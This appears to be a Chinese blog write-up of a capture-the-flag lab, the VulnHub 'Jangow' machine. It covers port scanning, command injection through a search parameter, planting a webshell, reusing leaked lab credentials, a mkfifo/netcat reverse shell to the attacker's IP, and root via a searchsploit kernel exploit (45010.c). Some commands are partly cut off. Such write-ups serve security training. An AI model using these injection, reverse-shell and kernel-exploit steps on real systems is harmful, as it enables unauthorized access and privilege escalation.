Jangow

Jangow

1.环境准备

  • 靶场地址:https://www.vulnhub.com/entry/jangow-101,754/
  • 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
  • 攻击机:kali(192.168.80.180)
  • 靶机:JANGOW(192.168.80.128)
  • 目标:提升为root权限获取root目录下的flag

2.信息收集

  • 确认目标IP

    arp-scan -l
    

    Jangow_第1张图片

  • 扫描开放端口

    nmap -Pn -sV -p- -A 192.168.80.128
    

    Jangow_第2张图片

    确认开放了21、80端口

3.寻找攻击点

  • 主页面

    Jangow_第3张图片

  • 访问site页面

    Jangow_第4张图片

  • 尝试点击不同页面,发现一个/site/busque.php?buscar=可以执行命令

    /site/busque.php?buscar=whoami
    

    Jangow_第5张图片

4.写入shell

  • 查看网站根目录

    /site/busque.php?buscar=pwd
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3Avqe8Gv-1684144765821)(D:\网安笔记\图片\image-20230514141833517.png)]

  • 向网站根目录写入webshell

    /site/busque.php?buscar=echo '' >> glc.php
    
  • 查看是否写入成功

    /site/busque.php?buscar=ls -la
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9vaNhfG3-1684144765822)(D:\网安笔记\图片\image-20230514142047759.png)]

  • 连接shell

    Jangow_第6张图片

5.网站信息收集

  • 发现.backup文件,里面有数据库用户名和密码

    $username = "jangow01";
    $password = "abygurl69";
    

    Jangow_第7张图片

  • 发现wordpress/config.php文件,里面也有用户名和密码

    $username = "desafio02";
    $password = "abygurl69";
    

    Jangow_第8张图片

6.尝试ftp登录

  • 使用之前翻到的两个账号密码分别尝试,结果.backup 文件中的可以登陆,翻看下没有什么有用的信息

    Jangow_第9张图片

7.获取交互式shell

  • 尝试常规的反弹shell,发现都不可以,可能是nc 不支持 -e 参数,这个时候可以使用 mkfifo 命令创建命名管道反弹shell;使用蚁剑在/var/www/html/site/下面新建shell.php文件,内容在下面

    &1|nc 192.168.80.180 443 >/tmp/f");?>
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0EVOY5KO-1684144765823)(D:\网安笔记\图片\image-20230514144306287.png)]

  • 攻击机开启443端口监听

    nc -lvvp 443
    

    Jangow_第10张图片

  • 用浏览器去访问shell.php文件,成功反弹shell

    Jangow_第11张图片

  • 查看是否存在python环境

    whereis python
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YidwRR9q-1684144765824)(D:\网安笔记\图片\image-20230514144448627.png)]

  • 存在python环境,切换交互式shell

    python3 -c 'import pty;pty.spawn("/bin/bash")'
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YmpfEUvp-1684144765824)(D:\网安笔记\图片\image-20230514144519095.png)]

8.提权

  • 查看内核版本

    uname -a
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JOPvrSLG-1684144765825)(D:\网安笔记\图片\image-20230514144633064.png)]

  • 查看发行版本

    lsb_release -a
    

    Jangow_第12张图片

  • 内核版本为4.4.0-31,发行版本为Ubuntu16.04

  • 利用searchsploit工具搜索一下

    searchsploit ubuntu 4.4.0-31 
    

    Jangow_第13张图片

    searchsploit ubuntu 16.04 
    

    Jangow_第14张图片

  • 我使用的是45010.c,将文件下载到本地

    searchsploit -m 45010.c
    

    Jangow_第15张图片

  • 在本地进行编译

    gcc 45010.c -o exp 
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GXxFjdqU-1684144765826)(D:\网安笔记\图片\image-20230514145258135.png)]

  • 上传exp文件到靶机,增加执行权限,然后执行

    Jangow_第16张图片

    chmod +x exp
    

    Jangow_第17张图片

你可能感兴趣的:(vulnhub,linux,php,web安全)